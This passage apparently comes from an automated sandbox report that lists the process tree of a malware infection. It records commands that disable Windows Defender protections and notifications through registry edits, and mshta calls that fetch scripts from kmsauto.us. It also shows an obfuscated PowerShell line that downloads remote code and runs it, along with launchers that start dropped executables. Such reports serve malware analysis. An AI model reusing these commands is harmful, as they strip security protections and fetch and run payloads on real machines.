C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"5⤵
-
C:\Windows\system32\find.exefind /i "SecHealthUI"6⤵
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"6⤵
-
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f5⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f5⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\PackageState\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_8wekyb3d8bbwe" /f5⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility5⤵
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility6⤵
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\INzzFcp2.com"C:\Users\Admin\AppData\Local\Temp\INzzFcp2.com"3⤵
- Executes dropped EXE
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt4⤵
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RPCM5VdB.com"C:\Users\Admin\AppData\Local\Temp\RPCM5VdB.com"3⤵
- Executes dropped EXE
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt4⤵
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X5⤵
- Blocklisted process makes network request
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2264 -s 26246⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
-
C:\Users\Admin\Documents\Q2I2YzAMB_JBSO1VLoIrLXer.exe"C:\Users\Admin\Documents\Q2I2YzAMB_JBSO1VLoIrLXer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Q2I2YzAMB_JBSO1VLoIrLXer.exe"C:\Users\Admin\Documents\Q2I2YzAMB_JBSO1VLoIrLXer.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\6ISgl_BtDTv9hSzZx6SmrqBl.exe"C:\Users\Admin\Documents\6ISgl_BtDTv9hSzZx6SmrqBl.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\yklip9lLUdwW3N17zW8e9dl0.exe"C:\Users\Admin\Documents\yklip9lLUdwW3N17zW8e9dl0.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\ThuseeB9VMpA_ss9wUX0wqa6.exe"C:\Users\Admin\Documents\ThuseeB9VMpA_ss9wUX0wqa6.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 2443⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe"C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ( "C:\Users\Admin\Documents\B8EAiQM0r0gOaZgQvIQDDAyE.exe" ) do taskkill -F -im "%~NxQ"4⤵
-
C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExEBX0iUoFB.EXe -PyTJSIPDC12bsxp0f15⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ( "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"7⤵
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac6⤵
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -im "B8EAiQM0r0gOaZgQvIQDDAyE.exe"5⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Documents\y8CjKi3AYSnoDbR9Q1TJtwob.exe"C:\Users\Admin\Documents\y8CjKi3AYSnoDbR9Q1TJtwob.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 3044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KU6UUiwSos.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 2884⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 2884⤵
- Program crash
-
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe"C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8052 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Windows security modification
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 1644⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5764 -s 284⤵
